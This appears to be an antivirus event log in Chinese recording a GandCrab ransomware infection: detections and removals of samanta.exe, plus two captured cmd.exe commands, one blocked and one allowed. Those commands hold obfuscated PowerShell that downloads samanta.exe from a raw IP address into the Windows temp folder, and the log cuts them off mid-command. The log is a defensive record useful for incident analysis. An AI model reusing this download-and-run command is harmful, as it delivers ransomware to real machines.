【1】2019-03-13 15:58:28,病毒防御,恶意行为监控,发现未知病毒BEHAV:Ransom/Rattrap.A, 已清除
病毒名称:BEHAV:Ransom/Rattrap.A
文件路径:C:\Users\Admin\Desktop\GandCrab5.213\samanta.exe
用户操作:已清除
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
【2】2019-03-13 15:56:50,病毒防御,恶意行为监控,发现未知病毒BEHAV:Ransom/Rattrap.A, 已清除
病毒名称:BEHAV:Ransom/Rattrap.A
文件路径:C:\windows\temp\191.exe
用户操作:已清除
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
【3】2019-03-13 15:56:34,系统防御,自定义防护,cmd.exe触犯自定义文件防护规则, 已允许
操作者:C:\windows\SysWOW64\cmd.exe
命令行:c:\windows\system32\cmd /c set p=power&& set s=shell&& call %p%%s% $RAZY83lq = '$zDTzYNWK8 = new-obj-122533090-465901954-1104848796ect -com-122533090-465901954-1104848796obj-122533090-465901954-1104848796ect wsc-122533090-465901954-1104848796ript.she-122533090-465901954-1104848796ll;$qWGZblF = new-object sys-122533090-465901954-1104848796tem.net.web-122533090-465901954-1104848796client;$gNR1Y = new-object random;$YJ5WjlFc = \"-122533090-465901954-1104848796h-122533090-465901954-1104848796t-122533090-465901954-1104848796t-122533090-465901954-1104848796p-122533090-465901954-1104848796://205.185.125.109/samanta.exe\".spl-122533090-465901954-1104848796it(\",\");$SND7j = $gNR1Y.nex-122533090-465901954-1104848796t(1, 65536);$vPw8tqgia = \"c:\win-122533090-465901954-1104848796dows\tem-122533090-465901954-1104848796p\191.ex-122533090-465901954-1104848796e\";for-122533090-465901954-1104848796each($mFtaPgz in $YJ5WjlFc){try{$qWGZblF.dow-122533090-465901954-1104848796nlo-122533090-465901954-1104848796adf-122533090-4659
触犯规则:阻止CMD风险操作
操作类型:执行
操作文件:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
用户操作:已允许
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
【4】2019-03-13 15:56:00,系统防御,自定义防护,cmd.exe触犯自定义文件防护规则, 已阻止
操作者:C:\windows\SysWOW64\cmd.exe
命令行:c:\windows\system32\cmd /c set p=power&& set s=shell&& call %p%%s% $RAZY83lq = '$zDTzYNWK8 = new-obj-122533090-465901954-1104848796ect -com-122533090-465901954-1104848796obj-122533090-465901954-1104848796ect wsc-122533090-465901954-1104848796ript.she-122533090-465901954-1104848796ll;$qWGZblF = new-object sys-122533090-465901954-1104848796tem.net.web-122533090-465901954-1104848796client;$gNR1Y = new-object random;$YJ5WjlFc = \"-122533090-465901954-1104848796h-122533090-465901954-1104848796t-122533090-465901954-1104848796t-122533090-465901954-1104848796p-122533090-465901954-1104848796://205.185.125.109/samanta.exe\".spl-122533090-465901954-1104848796it(\",\");$SND7j = $gNR1Y.nex-122533090-465901954-1104848796t(1, 65536);$vPw8tqgia = \"c:\win-122533090-465901954-1104848796dows\tem-122533090-465901954-1104848796p\191.ex-122533090-465901954-1104848796e\";for-122533090-465901954-1104848796each($mFtaPgz in $YJ5WjlFc){try{$qWGZblF.dow-122533090-465901954-1104848796nlo-122533090-465901954-1104848796adf-122533090-4659
触犯规则:阻止CMD风险操作
操作类型:执行
操作文件:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
用户操作:已阻止